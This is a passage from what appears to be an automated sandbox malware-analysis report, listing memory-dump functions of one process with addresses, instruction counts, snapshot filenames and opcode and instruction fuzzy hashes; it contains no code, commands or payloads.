                                        • Opcode Fuzzy Hash: d0e431de01890397017ee19ece007832f3cd7d9982f19d8c82ca2855dc724cce
                                        • Instruction Fuzzy Hash: F8115E7090864D8FCF85EF68C858AE97BF0FF29300F0101AAE819C7261DB34D554CB80
                                        Function 00007FFD9BAEB519 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12c38b985b429c6daf98fa0f4ceae376d2a983f29146f9b33e278f7612e2757e
                                        • Instruction ID: d66c017137cb2ed2f79dbf18e3eafa338637a8be7c3d3bb2deea79a994ac6ef7
                                        • Opcode Fuzzy Hash: 12c38b985b429c6daf98fa0f4ceae376d2a983f29146f9b33e278f7612e2757e
                                        • Instruction Fuzzy Hash: 10117C3090868D8FCF45EF68C898AEA7BF0FF29301F01019AE859D32A1DB349554CB80
                                        Function 00007FFD9BC62949 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2024714342.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bc60000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6a71ef7cebc0dfeb6379f642d9414abf3bfeeb23122290071ea376542c0e9c05
                                        • Instruction ID: 99b00c5e02e9654e596f80588ffcdf035b6edbc88f81a6bac0f9bea9410fb0ab
                                        • Opcode Fuzzy Hash: 6a71ef7cebc0dfeb6379f642d9414abf3bfeeb23122290071ea376542c0e9c05
                                        • Instruction Fuzzy Hash: 1C01803090968D8FCB45DF68C8959D97FF0FF59300F0501AAE849C71A2CB34A985CB41
                                        Function 00007FFD9BAB8EA1 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f2ad1706d985c47a7df0d64dabf5cc478622759b23891739ae58cb0929c073e
                                        • Instruction ID: 315c097a4f75fff5bfe9d8d2f220e25526cdf32de8bda9a5366b24255bd78c00
                                        • Opcode Fuzzy Hash: 5f2ad1706d985c47a7df0d64dabf5cc478622759b23891739ae58cb0929c073e
                                        • Instruction Fuzzy Hash: DE010471A1968C8FCB85EF18C891AD93BF0FF69304F0601A6E859C7261D734E950CB81
                                        Function 00007FFD9BAE5C99 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bad8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3be793a8d012cce68fcebe93f7df3fb42dfc36439770b6d0e418e5d4ec2e8d39
                                        • Instruction ID: b3dd37f457a6cac966829f7078135d427ef9942756f38c68dfccc8af2539ef03
                                        • Opcode Fuzzy Hash: 3be793a8d012cce68fcebe93f7df3fb42dfc36439770b6d0e418e5d4ec2e8d39
                                        • Instruction Fuzzy Hash: 2A11093090864D8FCF85EF68C899AEE7BF0FF68304F0505AAE459D7261DB34A594CB81
                                        Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5beb3102a550ff38c0d2008b1e3dbb9ab970d12f301d030a682edbcc99b0596e
                                        • Instruction ID: 1a775d8de43b56db0cc6cdfd184db301b4b3447e182fcf15debb0a6abdf3cfd3
                                        • Opcode Fuzzy Hash: 5beb3102a550ff38c0d2008b1e3dbb9ab970d12f301d030a682edbcc99b0596e
                                        • Instruction Fuzzy Hash: 91110471A0E28E8FE722AFA4C8242E97B71EF42310F0545B7D059DB1E3CA786614C7A5
                                        Function 00007FFD9BB0D66C Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAFF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFF000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baff000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 312121890d372c5ccd231f5607fa6bc0e0c843ddb46181f77d6a46ddc063cafb
                                        • Instruction ID: 3488bd27aae3cc886d663c1548da054a2d10456bc10bd8294b2466ff2b8277de
                                        • Opcode Fuzzy Hash: 312121890d372c5ccd231f5607fa6bc0e0c843ddb46181f77d6a46ddc063cafb
                                        • Instruction Fuzzy Hash: 3401C570918A4D8FDF84EF58C899AE97BF0FF68305F10056AE859D32A0DB70E590CB81
                                        Function 00007FFD9BAEE579 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 03bb3903d18fe87328158500ac1048efd4b47ac67926e72e847273b7aca3b5b7
                                        • Instruction ID: a7cc9cd158846ef0fbb09ca01bfbaebca5ef3ab211b96b93a2ce5356579f5697
                                        • Opcode Fuzzy Hash: 03bb3903d18fe87328158500ac1048efd4b47ac67926e72e847273b7aca3b5b7
                                        • Instruction Fuzzy Hash: A501527090964D8FCF85EF68C858AAA7BF0FF25301F05059BE418C71A2D7309994CB81
                                        Function 00007FFD9BC62AE9 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2024714342.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bc60000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9aa0149257a9bc20163c8d8dc4794f73933bce77289f41495569250880d85d9
                                        • Instruction ID: 9686d78076a1bad6eb34a55e7550735221be3c4fb9f160cae99affb0203806b7
                                        • Opcode Fuzzy Hash: e9aa0149257a9bc20163c8d8dc4794f73933bce77289f41495569250880d85d9
                                        • Instruction Fuzzy Hash: 1F014C30909A4D8FCF85EF68C858AAE7BF0FF69301F05019BE419C72A1DB349994CB41
                                        Function 00007FFD9BAEDBA9 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2ce1ddec1f5baebad8494477bbe33113823e1c17048d16b81c01cc3d7474da8
                                        • Instruction ID: c8281d44d0831170cf3d4ddda8a61fef996290fc6003c5798d0f3d07a778c7f1
                                        • Opcode Fuzzy Hash: c2ce1ddec1f5baebad8494477bbe33113823e1c17048d16b81c01cc3d7474da8
                                        • Instruction Fuzzy Hash: F3014C3090968C8FCF45EF28C865AD97FF0FF29304F0541AAE849C71A1DB34A994CB81
                                        Function 00007FFD9BADFA69 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bad8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5d37f03a5e7c564f5fb253e051c77001e7e4705df21948acfeda3a59a671bbbf
                                        • Instruction ID: 767b0ce3eb701bf9394cef0ac72f7d3ef76faa571e9d8ab7bf47ac3eb7800c2b
                                        • Opcode Fuzzy Hash: 5d37f03a5e7c564f5fb253e051c77001e7e4705df21948acfeda3a59a671bbbf
                                        • Instruction Fuzzy Hash: DF014C3090864D8FDF85EF68C898AEA7FF0FF69301F0101AAD418C72A1DB359594CB80
                                        Function 00007FFD9BADF999 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bad8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 378bc818bf34ff70343b7b945e1469f6dfa4ca90887d4af3f671deb9c56f47ea
                                        • Instruction ID: 35b6df632ab1032e0bf52863f40a28202fddfc90b48e02af083aa4986e92e1e0
                                        • Opcode Fuzzy Hash: 378bc818bf34ff70343b7b945e1469f6dfa4ca90887d4af3f671deb9c56f47ea
                                        • Instruction Fuzzy Hash: 5E01293090868D8FCF85EF58C898AEA7BF0FF69300F0501AAD418D72A2DB359594CB80
                                        Function 00007FFD9BAECF39 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1ead953b071645b1151f068910fe84c5e072a0603b80ef9f7ce716514e357e2
                                        • Instruction ID: d233f4fa2f5c60f08b4e45fbea9e1ced2bed34d32b4b8a3b396425e6a77c2c0b
                                        • Opcode Fuzzy Hash: b1ead953b071645b1151f068910fe84c5e072a0603b80ef9f7ce716514e357e2
                                        • Instruction Fuzzy Hash: 0601403091968C8FCF45DF58C859AD97FF0FF69305F0501AAD449C71A2D7359954CB41
                                        Function 00007FFD9BC61A69 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2024714342.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bc60000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a1bf21e11704b02d20ada0dfecd2dea7e0ca1d1a7926485ceb57692e39bd621
                                        • Instruction ID: 95471d950da8e2f02817b5a6fa86664d4cef705f9f23cbe93f18f716f8ab8906
                                        • Opcode Fuzzy Hash: 9a1bf21e11704b02d20ada0dfecd2dea7e0ca1d1a7926485ceb57692e39bd621
                                        • Instruction Fuzzy Hash: A5014C30909A8D8FCB45EF68C869A997FF0FF69301F0541AAE448C71A2D734DA94CB81
                                        Function 00007FFD9BACA0F7 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ec72d129cee2b352ed78a2c1322bf2a1127db656ed5544ca3ad82f9d8a7f39e
                                        • Instruction ID: 961820607eec178b68a6a878218dc74be692acf28955bbccd78da5663cb6f311
                                        • Opcode Fuzzy Hash: 9ec72d129cee2b352ed78a2c1322bf2a1127db656ed5544ca3ad82f9d8a7f39e
                                        • Instruction Fuzzy Hash: 1711B331A4952ECEEB70EB44C859BA9B3F1FB54311F0041E5C10DD76A1DB746A849F10
                                        Function 00007FFD9BAF6230 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 98de464c36605a1816f89f9768f5649bbb9cab732f7378f0398fb676417e07de
                                        • Instruction ID: b62c446e097d64005136d9f7cd5a41960a7a4dfa825e7b38708e99f0a4b86cfe
                                        • Opcode Fuzzy Hash: 98de464c36605a1816f89f9768f5649bbb9cab732f7378f0398fb676417e07de
                                        • Instruction Fuzzy Hash: 3901A870914A4D9FDF84EF68C849AEE7BF0FB68305F00456AA81DD3260DB71E594CB81
                                        Function 00007FFD9BAF6150 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2264cb006c71eacd1bfac796884f6f31109dcca2d93e954d23ad4d0db12bf321
                                        • Instruction ID: e2e68d846a13682d3b52ff39418b01126b98cbc79694053375206bde34f1e59d
                                        • Opcode Fuzzy Hash: 2264cb006c71eacd1bfac796884f6f31109dcca2d93e954d23ad4d0db12bf321
                                        • Instruction Fuzzy Hash: 5A01A870914A4D9FDF84EF68C849AEE7BF0FB68305F00456AA81DD3264DB71E594CB81
                                        Function 00007FFD9BAE3641 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bad8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9b8617e3a1d0ac07a623f9abf83764b5ee31fe9ef348091dd75e4d830b257d8
                                        • Instruction ID: 8675c86f6b6990f87db1dd3797440b1733e7d27fec611dce62a1a16c23eb8d9f
                                        • Opcode Fuzzy Hash: d9b8617e3a1d0ac07a623f9abf83764b5ee31fe9ef348091dd75e4d830b257d8
                                        • Instruction Fuzzy Hash: CF01867091968D8FDB51EF68C8596D97FF0FF28305F0105AAE808C72A1D734E550CB41
                                        Function 00007FFD9BAC0690 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 808f569cc8882f0d8e4d4335fdf85fb241a41c3e58087ce26f962336c707de29
                                        • Instruction ID: 7a994e18273ffd4f7be9696446791a6b24acbf3d7012f421ea6779862f0737f6
                                        • Opcode Fuzzy Hash: 808f569cc8882f0d8e4d4335fdf85fb241a41c3e58087ce26f962336c707de29
                                        • Instruction Fuzzy Hash: 4A01A870914A4D9FDF84EF58C849AEEBBF0FB68305F00456AA81DD3260DB70A694CB81
                                        Function 00007FFD9BAF9BB9 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d12de8d2b47c73ab9aa2a80f3777141face6f2ca35ca1a609d1c2626beeb7aca
                                        • Instruction ID: 1d4f79333c5fde24308e08b98631f1adc08906253597da95fd363314233a8938
                                        • Opcode Fuzzy Hash: d12de8d2b47c73ab9aa2a80f3777141face6f2ca35ca1a609d1c2626beeb7aca
                                        • Instruction Fuzzy Hash: 91015E3090968D8FDB85EF68C858AA97FB0FF25301F0501DBD458C71A1DB349994CB40
                                        Function 00007FFD9BAF3139 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8bf7cff90ebf61acf7dc0a031191f131e691316f2f7d3fa3447a1e6c5bcb9c00
                                        • Instruction ID: 462d84b5dc252b07c3edf43cef3e2f11d387c7f0db00731a976ad652b109a752
                                        • Opcode Fuzzy Hash: 8bf7cff90ebf61acf7dc0a031191f131e691316f2f7d3fa3447a1e6c5bcb9c00
                                        • Instruction Fuzzy Hash: 33017C3190978C8FCB85DF64C864AA97FB0FF25300F0501EAD408C72A2D634A994CB41
                                        Function 00007FFD9BC62F59 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2024714342.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bc60000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07a3d7aec4f48b13986887033b047d836ed580c5c82a3d5ec045cdb68667f150
                                        • Instruction ID: c8c28e509c28416f7ee13c406b2d65d010ae38ceb677e3303585ef4c3c4e3117
                                        • Opcode Fuzzy Hash: 07a3d7aec4f48b13986887033b047d836ed580c5c82a3d5ec045cdb68667f150
                                        • Instruction Fuzzy Hash: F7018F3090968D8FCB95DF64C894AD97FB0FF19300F0501AAD408C71A1CB359995CB81
                                        Function 00007FFD9BAB9395 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 22cc5091b5c98812d44b74f131fecb24d62339a1d29cb3af64b31867518324a9
                                        • Instruction ID: 899b02b14d91f4c034019bfe1acbab8338c66292e8b3f6f921bb68cb37539fdd
                                        • Opcode Fuzzy Hash: 22cc5091b5c98812d44b74f131fecb24d62339a1d29cb3af64b31867518324a9
                                        • Instruction Fuzzy Hash: A801FD3590878C8FCB44EF18C8565ED3BE0FF58304F0102AAE84883291DB38E654CB82
                                        Function 00007FFD9BADBD05 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bad8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b944c45746e0d3c94328f29363be1a9e755d2e75070712295bda4099253c5a9
                                        • Instruction ID: 2b9f2125267a3fc2e59b9b7c3fc49fe46fba5310ac9f860e9bdda0bfd693387b
                                        • Opcode Fuzzy Hash: 8b944c45746e0d3c94328f29363be1a9e755d2e75070712295bda4099253c5a9
                                        • Instruction Fuzzy Hash: C0011D70908A4D8FDF95EF58C899A997BF0FF68300F4541E6E948C7261DA74D594CB40
                                        Function 00007FFD9BAC3D2E Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7bbdbf9c0c05db2731568043a56b62456129d364a11210e26b5d031d8f7d7f1f
                                        • Instruction ID: 5b5b3d45b13fa493719e14667089b5f35007fbaf11c6b832d443c03e50defb1a
                                        • Opcode Fuzzy Hash: 7bbdbf9c0c05db2731568043a56b62456129d364a11210e26b5d031d8f7d7f1f
                                        • Instruction Fuzzy Hash: 0C015E7091A65D8FDB61EB54C869AE8B7B1FF18300F1002F9D01CD7166DB745A898F40
                                        Function 00007FFD9BAF2419 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07a06b865e8e49cdd8d4273124a0bd73a3ee726b46f9028f8d31092dc36d39d6
                                        • Instruction ID: 02b0c765362d911148eca4ec3c497e9570decb43ac6178819e9afe38f147feec
                                        • Opcode Fuzzy Hash: 07a06b865e8e49cdd8d4273124a0bd73a3ee726b46f9028f8d31092dc36d39d6
                                        • Instruction Fuzzy Hash: 9D01AF30A0964D9FCF84EF58C4A4AEA7BF0FF18304F1400AAE40DC32A1DB31A690CB81
                                        Function 00007FFD9BAEB5F9 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cbb915fbfede7f24948074660513303b9a7ffb8a38c46f647ca8c7cc3bd58921
                                        • Instruction ID: c19042b342d182eedc0303a0b6e72edfa03d4f7a230d7fcf7e74c4814eafeb6f
                                        • Opcode Fuzzy Hash: cbb915fbfede7f24948074660513303b9a7ffb8a38c46f647ca8c7cc3bd58921
                                        • Instruction Fuzzy Hash: F5018F3090868C8FCB95EF64C8A9AA97FB0FF65300F4500EAD448C71A2CB349A94CB40
                                        Function 00007FFD9BAF4CC9 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9b03026e642f25da44e295852500ca2211665c0a886e5a43e279dafd08ed77a
                                        • Instruction ID: 52339dfd6f3851822bf6d4028b94d680625426bcf023bc419f450a86dba25a4d
                                        • Opcode Fuzzy Hash: f9b03026e642f25da44e295852500ca2211665c0a886e5a43e279dafd08ed77a
                                        • Instruction Fuzzy Hash: 67014B31A0968D8FDB95EF68C8546E97FB0FF55300F0505AAD418C72A6EB749A54CB40
                                        Function 00007FFD9BC61B39 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2024714342.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bc60000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f90d0362ccb1c09af80e8f6abfc7b1b900116c2cbd0921a1264a6b397728158
                                        • Instruction ID: 8642b9904ebe09ca0226f758240d1c9f6abbd3dd4487d7aed2f50c50b4e8783f
                                        • Opcode Fuzzy Hash: 9f90d0362ccb1c09af80e8f6abfc7b1b900116c2cbd0921a1264a6b397728158
                                        • Instruction Fuzzy Hash: 67018F7090868D8FCB85DF68C868AAD7FB0FF65301F0540DBD448C71A2DB349A94CB80
                                        Function 00007FFD9BAEBA98 Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9e4f7f5bc44ba5fd5ac9d0e3d1689386f755b082b63519ce76e7861596abb9a
                                        • Instruction ID: dddf4400ce243015422369595079038ad4b5d7c9d9e76d6c9eef576ff39591d4
                                        • Opcode Fuzzy Hash: f9e4f7f5bc44ba5fd5ac9d0e3d1689386f755b082b63519ce76e7861596abb9a
                                        • Instruction Fuzzy Hash: F2011930914A4D9FCF84EF58C859AEA7BE0FF68305F01016AA40DD3260DB35A694CB80
                                        Function 00007FFD9BAEE590 Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c157d2bdae35add81129f495f788514ff3117eea6113332dfeeca39dede9836
                                        • Instruction ID: fa1f88dfed1d38373534c8f3e9d0c81f7d2e7bac850aa69e2ab2fe63d98f8321
                                        • Opcode Fuzzy Hash: 9c157d2bdae35add81129f495f788514ff3117eea6113332dfeeca39dede9836
                                        • Instruction Fuzzy Hash: CB01C97091490D8FDF84EF58C848AAEBBF0FB68305F00456AA41DD32A4DB709690CB80
